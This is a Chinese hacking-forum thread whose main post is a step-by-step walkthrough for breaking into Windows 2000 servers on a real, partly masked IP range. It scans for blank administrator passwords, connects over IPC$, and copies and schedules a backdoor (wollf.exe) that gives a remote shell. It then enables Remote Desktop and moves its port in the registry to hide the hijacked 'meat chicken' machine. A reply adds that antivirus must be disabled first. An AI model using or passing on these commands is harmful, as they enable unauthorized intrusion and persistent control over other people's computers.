|
 | 作者: feng5 [feng5]
 |
登录 |
| 工具:流光4.7 (http://www.heibai.net/download/show.php?id=2277&down=1) Wollf v1.6 (http://www.heibai.net/download/show.php?id=2996&down=1) HBULOT (http://www.heibai.net/download/show.php?id=2951&down=1) 本机平台:2000/NT 目标平台:2000/NT以上工具在黑白均能找到,具体使用方法会在文章中会介绍。 首先打开流光(如果你连流光都没听过过的话,我想你没必要看这篇文章),Ctrl+A,填上一段ip,选择IPC扫描。过一会有结果了: 218.22.155.* (SERVER) -------------------------------------------------------------------------------- IPC扫描获得共享列表 g f e h I获得用户列表029 1 2 Administrator (Admin) Guest IUSR_SERVER IWAM_SERVER TsInternetUser猜解成功用户帐号 Administrator (Admin):(NULL)随便找了一台做实验,先ipc$连上再说。 ========================================================================================== C:\Documents and Settings\shanlu.XZGJDOMAIN>net use \\218.22.155.*\ipc$ "" /us er:administrator----------------连接成功! 命令成功完成。C:\Documents and Settings\shanlu.XZGJDOMAIN>copy wollf.exe \\218.22.155.*\admi n$------------------------------拷贝wollf.exe到目标计算机的admin$目录 已复制 1 个文件。C:\Documents and Settings\shanlu.XZGJDOMAIN>copy hbulot.exe \\218.22.155.*\adm in$-----------------------------拷贝hbulot.exe到目标计算机的admin$目录 已复制 1 个文件。C:\Documents and Settings\shanlu.XZGJDOMAIN>net time \\218.22.155.* \\218.22.155.* 的当前时间是 2002/12/1 上午 06:37 命令成功完成。C:\Documents and Settings\shanlu.XZGJDOMAIN>at \\218.22.155.* 06:39 wollf.exe 新加了一项作业,其作业 ID = 1--指定wollf.exe在06:39运行 ------------------------------------------------------------------------------------------ 说明: wollf.exe是一个后门程序,很多高手都喜欢nc或者winshell,不过我对他情有独钟!在这里我只介绍与本文内容有关的命令参数,它的高级用法不做补充。 hbulot.exe是用于开启3389服务,如果不是server及以上版本,就不要运行了。因为pro版不能安装终端服务。 2分钟后...... ========================================================================================== C:\Documents and Settings\shanlu.XZGJDOMAIN>wollf -connect 218.22.155.* 7614 "Wollf Remote Manager" v1.6 Code by wollf, http://www.xfocus.org ------------------------------------------------------------------------------------------ 说明: 使用wollf连接时要注意wollf.exe要在当前目录,它的连接命令格式:wollf -connect IP 7614 7614是wollf开放的端口。如果显示如上,说明你已经连接成功,并具有管理员administrator权限。 ========================================================================================== [server@D:\WINNT\system32]#dosMicrosoft Windows 2000 [Version 5.00.2195] (C) 版权所有 1985-2000 Microsoft Corp. ------------------------------------------------------------------------------------------ 说明: 输入dos,你就会进入目标机的cmd下,这时同样具有administrator权限。 ========================================================================================== D:\WINNT\system32>cd.. cd..D:\WINNT>dir h*.* dir h*.* 驱动器 D 中的卷没有标签。 卷的序列号是 1CE5-2615D:\WINNT 的目录2002-11-27 03:07 <DIR> Help 2002-09-10 12:16 10,752 hh.exe 2002-10-01 08:29 24,576 HBULOT.exe 2 个文件 35,328 字节 1 个目录 9,049,604,096 可用字节D:\WINNT>hbulot hbulot ------------------------------------------------------------------------------------------ 说明: 因为我们把HBULOT.exe放到目标机的admin$下的,所以先找到它,以上是文件的存放位置。 ========================================================================================== D:\WINNT>exit exitCommand "DOS" succeed. [server@D:\WINNT\system32]#reboot Command "REBOOT" succeed. [server@D:\WINNT\system32]# Connection closed. ------------------------------------------------------------------------------------------ 说明: 由dos退到wollf的连接模式下用exit命令,HBULOT.exe运行后需重新启动方可生效,这里wollf自带的REBOOT 命令,执行过在5秒后你就会失去连接。启动完毕后检查一下3389端口是否开放,方法很多,superscan3扫一下。这时候你就可以登陆了。如果没有开放3389那就不是server及以上版本,就不要运行了。因为pro版不能安装终端服务。 到这里,你已经拥有3389肉鸡了!但是会不会被别的入侵者发现呢?下面所教的就是怎么让3389只为你服务!我们现在使用的3389登陆器有两种版本,一种是2000/98,一种是XP。二者区别呢?前者使用的默认端口3389对目标,后者默认的也是3389端口,但是它还支持别的端口进行连接!所以呢......我们来修改3389的连接端口来躲过普通扫描器的扫描!修改方法如下: 修改服务器端的端口设置 ,注册表有2个地方需要修改。 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] PortNumber值,默认是3389,修改成所希望的端口,比如1314 第二个地方: [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] PortNumber值,默认是3389,修改成所希望的端口,比如1314 现在这样就可以了。重启系统吧。 注意:事实上,只修改第二处也是可以的。另外,第二处的标准联结应该是 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\<connection> <connection>表示具体的某个RDP-TCP连结。 重启过后,看看端口有没有改。 小技巧:修改注册表键值时,先选择10进制,输入你希望的端口数值,再选择16进制,系统会自动转换。 |
| 地主 发表时间: 04-04-15 19:04 |
 | 回复: yingzike [yingzike]  论坛用户 |
登录 |
前提先关掉双方的可以杀毒的软件 |
| B1层 发表时间: 04-04-15 20:24 |
| 回复: feng5 [feng5] |
登录 |
|
你有试过这方法? |
| B2层 发表时间: 04-04-22 16:29 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 编程破解
标题: 开始到现在:从ipc$到开放3389